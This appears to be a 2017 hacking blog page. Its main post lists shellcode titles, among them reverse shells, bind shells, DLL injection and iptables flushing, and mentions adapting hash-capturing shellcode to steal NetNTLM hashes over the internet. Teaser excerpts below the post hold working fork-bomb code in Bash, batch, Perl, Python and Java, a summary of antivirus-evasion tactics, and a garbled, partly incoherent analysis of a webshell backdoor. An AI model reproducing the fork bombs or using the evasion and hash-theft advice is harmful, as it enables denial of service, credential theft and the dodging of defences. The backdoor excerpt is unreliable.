New 2017 Shellcode | Titles -- Link Direct to Code

By -
I've compiled a list of the most current shellcodes and linked each directly to their raw code. I am providing this list for analytical purpose to those that may be interested. Enjoy and use responsibly...


Windows x64 password protected bind shellcode.
Windows x64 CreateRemoteThread() DLL injection shellcode.
Linux/x86_x64 mkdir("ajit", 755) shellcode.
Linux/x86_64 shellcode that binds to TCP/5600.
Linux/x86_64 execve /bin/sh shellcode.
Linux multi/dual mode execve("/bin/sh", NULL, 0) shellcode.
Linux multi/dual mode reverse shell shellcode.
Linux/x86 reverse TCP alphanumeric staged shellcode.
Linux dual / multi mode bind shell shellcode.
Windows x86 protect process shellcode.
Linux reverse shell shellcode.
Linux x86-64 egghunter shellcode.
Linux x86_64 random listener
Windows x86 executable directory search shellcode.
RSA Asymmetric Polymorphic Shellcode.
Windows x86 reverse TCP staged alphanumeric shellcode.
Linux x86_64 polymorphic setuid(0) and execve(/bin/sh) shellcode.
Linux x86_64 polymorphic flush iptables shellcode.
Linux x86_64 polymorphic netcat reverse shell shellcode.
Linux x86_64 netcat reverse shell shellcode.
Windows x86 hide console window shellcode.
Linux/x86 file reader shellcode.
Art of Anti Detection 3 - Shellcode Alchemy.

 This shellcode uses CreateFile and tries to read a non existing network path. You can use tools such as Responder to capture NetNTLM hashes. The shellcode can be modified to steal hashes over internet. SMBRelay attacks can also be performed.


This list was compiled from 01/01/2017 thru 03/23/2017.
Data and code courtesy of Packetstormsecurity.  Thank you!

Cheers,

      'r3v

UPDATE:  since we are somewhat on topic for creating backdoors using reverse shell. I went on a hunt to find a SINGLE image.  A Security Er for a well known infosec team found a backdoor on a system that was currently still in use. He managed to get the rsh program used during the attackers session on local.  However, due to the scale and capabilities he was likely using it to manage a smaller bnet.  Anyway, I think it was written in BASH but I could be wrong. Thankfully I didn't have to search long and found the original screenshot of the tool, it's quite impressive as ur's expansive usage as to where normally u will have a small terminal type window to and make your way through the server, but...whatever. Here's a screenshot of the rsh.



Comments

Post a Comment

Popular posts from this blog

fork-bomb in several language implements

By -
anyone that has worked with Linux for any amount of time, the word fork bomb will be familiar. However, it's not just a terminal command. Below are some implementations in other languages, followed by mitigation tactics for Linux distros. BASH $ :(){ :|: & };: .sh (Shell file) #!/bin/bash ./$0|./$0& .bat (Windows bat implements) :TOP start "" %0 goto TOP ~OR~ %0|%0   #below is the same, but done in command line using ^ to escape specials: echo %0^|%0 > forkbomb.bat forkbomb.bat .pl (Perl implement) #! /bin/perl perl -e "fork while fork" & .py (Python implement) #! /bin/py import os while 1:     os.fork() (Java implement) public class ForkBomb {  public static void main(String[] args)   {    while(true)    { Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});   }  } } .js (Jav
[[ more --»-»

Malware and Successful AV Evasion Tactics

By -
The malware ideology, and even it's entire methodology has morphed over the last year or so. It was decided to write a piece to offer some clarity on the idea of “AV evasion”. There seems to be little in depth working knowledge of the actual various techniques used. Time for a quick lesson to give more definition to this increasingly popular malicious scripting. Below is a list of some of the current successful antivirus evasion tactics used by malware. Hash modification. One way AV’s are able to detect if a file is (or contains) a known malware by calculating the file hash. It avoids this detection by changing a simple bit in the binary thus allowing the file to evade any &OR hash detections. Specific malware signatures. Some signatures are specifically designed to catch an exploit or otherwise spotted by specific behaviors. By only reversing the signature, it is possible for this to modify the malware so no matching patterns reside in it's signature. Just one exam
[[ more --»-»

Decryption and Analysis of a "Shell" Backdoor

By -
Image
UPDATE [l] : shortly after finishing this post, I had decided to do a couple scans of the raw code. The results returned several Shell Trojan variants, and doing some permanent damage to windows systems. Reports available at ] VirusTotal ] and [ Malwr ]. Thanks to both services for the great results. It attempted network connx with the original url, not surprise from a webshell, IMO, only a bit strange that the likely 0wn/Op would keep such a trophy case in the wild like that? I mean really??. I would've expected an http request or few since nce that's who was hosting the assets but the requests were made to connect to "Hostthshellcode and then starts the endless streaming of the v1c's data and a continual stream of fresh code for the mal to swap out. This only confirmed the feeling I had about the src code. Multiple langs being used, illogical syntax and it's all just mixed together... if anyone can answer how this can support the back and forth exec using Perl,
[[ more --»-»